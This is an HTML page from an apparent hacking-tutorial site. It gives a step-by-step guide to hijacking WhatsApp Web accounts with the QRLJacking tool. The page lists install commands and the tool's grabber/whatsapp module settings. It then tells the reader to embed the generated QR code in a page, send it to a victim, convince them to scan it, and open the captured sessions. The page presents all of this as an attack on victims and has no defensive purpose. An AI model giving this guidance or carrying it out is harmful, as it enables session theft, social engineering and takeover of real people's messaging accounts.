<!DOCTYPE html>

<html>

<head>
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Dark World</title>
</head>

<style>
	{
		box-sizing: border-box;
	}


	 .topnav
	        {
	          overflow: hidden;
	          background-color: #333; 
	        }

	 .topnav a
	           {
	           	float: left;
	           	color: #f2f2f2;
	           	text-align: center;
	           	padding: 14px 16px;
	           	text-decoration: none;
	           	font-size: 17px;
	           }

	 .topnav a:hover
	                {
	                 background-color: #ddd;
	                 color: black;
	                }

	 .topnav a.active
	                  {
	                  	background-color: #4CAF50;
	                  	color: white;
	                  }
</style>

<body style="background-color:black">

	<p align="center">
		<img src="dark.jpg" style="width:100px;height:100px">
	</p>

	<p align="center"><font color="white" size="15px">
	<u>Dark World</u>
    </font></p>

    <p align="center"><font color="white" style="font-size: 24px">
    	Stroming Your Brain, Not Enter Your Legs
    </font></p>

    <div class="topnav">
    	<a href="home.html">Home</a>
    	<a href="sec.html"> System & Enviroment Configure </a>
    	<a href="ah.html">Android Hacking</a>
    	<a href="wh.html">Windows Hacking</a>
    	<a href="sh.html"> Social Network Hacking </a>
    	<a class="active" href="wph.html"> Whatsapp Hacking </a>
    	<a href="about.html"> About </a>
    </div>

    <p align="left" style="font-size: 18px"><font color="white">
        	Due to different authentication of whatsapp it can not be hacked with usual method. When scan the Whtasapp QR respect to the session it generates a hidden authentication key. And give access to the user. Here we hijack this QR session. Lets follow the steps....
   </font></p>

   <p align="left"><font color="white" style="font-size: 18px">
    	<u><b> Requirements </b></u>:  <br><br>
    	1. Geckodriver <br>
    	2. python3 <br>
    	3. pip3 <br>
    	4. QRLJacking Tool <br><br>
    	Now write down the following command & Excecute this...
    </font></p>

    <p align="left"><font color="green" style="font-size: 18px">
    	$ sudo su <br>
    	$ apt-get update <br>
    	$ apt-get upgrade <br>
    	$ wget https://github.com/mozilla/geckodriver/releases/download/v0.26.0/geckodriver-v0.26.0-linux32.tar.gz <br>
    	$ tar -xvzf geckodriver-v0.26.0-linux32.tar.gz <br>
    	$ mv - f geckodriver /usr/local/share/geckodriver <br>
    	$ ln -s /usr/local/share/geckodriver /usr/local/share/geckodriver <br>
    	$ git clone https://github.com/OWASP/QRLJacking.git <br>
    	$ cd QRLJacking <br>
    	$ pip3 install -r requirements.txt <br>
    	$ python3 QrlJacker.py
    </font></p>

    <p align="left" style="font-size: 18px"><font color="white">
        	Now select & enter parameter in the QRLJacking module.
    </font></p>

    <p align="left" style="font-size: 18px"><font color="yellow">
        	>>> <u>QrlJacker</u> > use grabber/whatsapp <br>
        	>>> <u>QrlJacker</u> Module(grabber/whatsapp) > set port 4585 <br>
        	>>> QrlJacker Module (grabber/whatsapp) > run
    </font></p>

    <p align="left" style="font-size: 18px"><font color="white">
        	Now you can see the generated dynamic QR in Firefox or any default set web browser. Push this QR  to any self design page and send to victim and convinced to scan. 
    </font></p>

    <p align="left"><font color="white" style="font-size: 18px">
    	<u><b> Usage / Operational Command </b></u>:  <br><br>
    	<font color="yellow" style="font-size: 18px">
    		sessions  => To show all captured sessions. <br>
    		sessions -i(sessions-Number)  => To execute/initiate particullar session data.
    	</font>
    	
    </font></p>

    <p align="center">
    	<img src="wph.jpg" style="width: 320px;height:320px;">
    </p

</body>
</html>